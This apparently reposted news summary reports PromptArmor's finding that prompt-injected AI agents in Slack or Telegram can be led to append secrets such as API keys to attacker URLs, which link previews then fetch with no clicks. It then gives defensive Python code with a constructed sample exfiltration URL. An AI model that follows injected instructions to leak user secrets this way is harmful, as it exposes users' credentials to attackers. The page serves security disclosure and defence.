AI agents can spill secrets via malicious link previews
Briefly

"Messaging apps commonly use link previews, which let the app query links dropped in a message to extract a title, description, and thumbnail to display in place of a plain URL. As discovered by AI security firm PromptArmor, link previews can turn URLs generated by an AI agent and controlled by an attacker into a zero-click data-exfiltration channel, allowing sensitive information to be leaked without any user interaction."
"As PromptArmor notes in its report, indirect prompt injection via malicious links isn't unheard of, but typically requires the victim to click a link after an AI system has been tricked into appending sensitive user data to an attacker-controlled URL. When the same technique is used against an AI agent operating inside messaging platforms such as Slack or Telegram, where link previews are enabled by default or in certain configurations, the problem gets a whole lot worse."
"Without a link preview, an AI agent or a human operator has to follow a link, triggering a network request after the AI system has been tricked into appending sensitive user data to an attacker-controlled URL. As mentioned, this type of prompt injection attack can extract various types of sensitive data, such as API keys and the like, by tricking an AI agent into appending the info onto the URL."
AI agents in messaging platforms can be manipulated to generate attacker-controlled URLs that include sensitive user data. Messaging apps often fetch link previews by querying links to extract metadata, which can cause the platform to request attacker-controlled URLs automatically. That automatic fetching turns manipulated URLs into zero-click data-exfiltration channels capable of leaking secrets without user interaction. Traditional prompt-injection attacks typically required a user or agent to click a link to trigger exfiltration. Agentic systems with link previews worsen the threat by enabling immediate leakage when the AI agent posts the URL. Extractable data includes API keys and other sensitive information.
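As an added illustration of a defensive control for the problem described above (this is example code written for this page, not PromptArmor's, The Register's, or any messaging platform's own code), the following Python filter sits between an AI agent and the messaging API and inspects every outbound message before it is posted. Because the platform's link preview fetches any URL the moment it is posted, the agent output is the last point at which a leak can still be stopped. The filter flags URLs whose host is not on an allowlist, URLs that embed a secret value the agent is known to hold, URLs that match common credential shapes, and query parameters carrying high-entropy values; flagged URLs are replaced with a placeholder so the platform has nothing to preview. The hostnames, the sample message and the secret value are constructed, and the credential regexes are illustrative heuristics rather than a vendor-maintained catalogue.

```python
import math
import re
from urllib.parse import parse_qsl, urlsplit

# Rough URL matcher for free text (constructed; trailing punctuation is trimmed later).
URL_RE = re.compile(r"https?://[^\s<>\"')\]]+")

# Heuristic shapes of common credential formats. Illustrative only; extend the
# list with the secret types the agent in your deployment can actually reach.
SECRET_PATTERNS = [
    re.compile(r"sk-[A-Za-z0-9_-]{16,}"),         # OpenAI-style API keys
    re.compile(r"AKIA[0-9A-Z]{16}"),              # AWS access key ids
    re.compile(r"gh[pousr]_[A-Za-z0-9]{20,}"),    # GitHub tokens
    re.compile(r"xox[baprs]-[A-Za-z0-9-]{10,}"),  # Slack tokens
]

# Constructed sample: one legitimate internal link and one attacker-shaped link
# into which a hypothetical agent has been tricked into appending an API key.
SAMPLE_MESSAGE = (
    "Summary is ready: https://wiki.example.com/pages/weekly-report?id=42 "
    "Also see https://cdn.attacker.example/collect?token=sk-live-4fA9xK2mQp7vLs8wR3nB"
)
ALLOWED_HOSTS = {"wiki.example.com"}                 # hosts the agent may link to
KNOWN_SECRETS = {"sk-live-4fA9xK2mQp7vLs8wR3nB"}     # secrets loaded into the agent


def shannon_entropy(value: str) -> float:
    """Bits of entropy per character; random tokens score well above prose or ids."""
    if not value:
        return 0.0
    counts = {}
    for ch in value:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(value)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def inspect_url(url, allowed_hosts, known_secrets, entropy_threshold=3.5):
    """Return the reasons this URL must not be posted; an empty list means it is clean."""
    reasons = []
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host not in allowed_hosts:
        reasons.append(f"host {host!r} is not on the allowlist")
    if any(secret and secret in url for secret in known_secrets):
        reasons.append("URL embeds a known secret value")
    for pat in SECRET_PATTERNS:
        if pat.search(url):
            reasons.append(f"URL matches secret pattern {pat.pattern!r}")
            break
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if len(value) >= 20 and shannon_entropy(value) > entropy_threshold:
            reasons.append(f"query parameter {key!r} carries a high-entropy value")
            break
    return reasons


def scan_outbound_message(text, allowed_hosts, known_secrets):
    """Map each URL in the message to the reasons it was flagged (clean URLs are omitted)."""
    findings = {}
    for m in URL_RE.finditer(text):
        url = m.group(0).rstrip(".,;:")
        reasons = inspect_url(url, allowed_hosts, known_secrets)
        if reasons:
            findings[url] = reasons
    return findings


def sanitize_message(text, allowed_hosts, known_secrets):
    """Replace flagged URLs with a placeholder so the platform has nothing to preview."""
    for url, reasons in scan_outbound_message(text, allowed_hosts, known_secrets).items():
        text = text.replace(url, "[link removed: " + "; ".join(reasons) + "]")
    return text


if __name__ == "__main__":
    for url, reasons in scan_outbound_message(SAMPLE_MESSAGE, ALLOWED_HOSTS, KNOWN_SECRETS).items():
        print("BLOCKED", url)
        for r in reasons:
            print("   -", r)
    print(sanitize_message(SAMPLE_MESSAGE, ALLOWED_HOSTS, KNOWN_SECRETS))
```

The allowlist check is the one that matters most: a secret can be encoded in ways no regex or entropy test will catch, but a URL pointing at a host the agent has no business contacting is always worth holding back, and a blocked URL never reaches the preview fetcher. Log the findings as well as redacting them, since a flagged message is evidence that the agent has been fed injected instructions.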
Read at Theregister